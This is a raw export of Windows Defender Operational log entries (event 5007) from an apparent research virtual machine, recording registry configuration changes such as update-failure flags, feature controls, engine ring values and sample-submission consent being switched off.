EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=437 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/14/2023 08:58:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=431 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\BddUpdateFailure = 0x0 11/14/2023 08:58:48 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=430 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Miscellaneous Configuration\DeltaUpdateFailure = 0x0 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=429 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\15 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=428 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\13 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=427 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\9 = 0x1 11/14/2023 08:58:47 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=426 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\7 = 0x1 11/14/2023 08:58:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=422 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpEngineRing = 0x2 New value: 11/14/2023 08:58:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=421 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\MpEngine\MpCampRing = 0x2 New value: 11/14/2023 07:06:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=259 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent = 0x0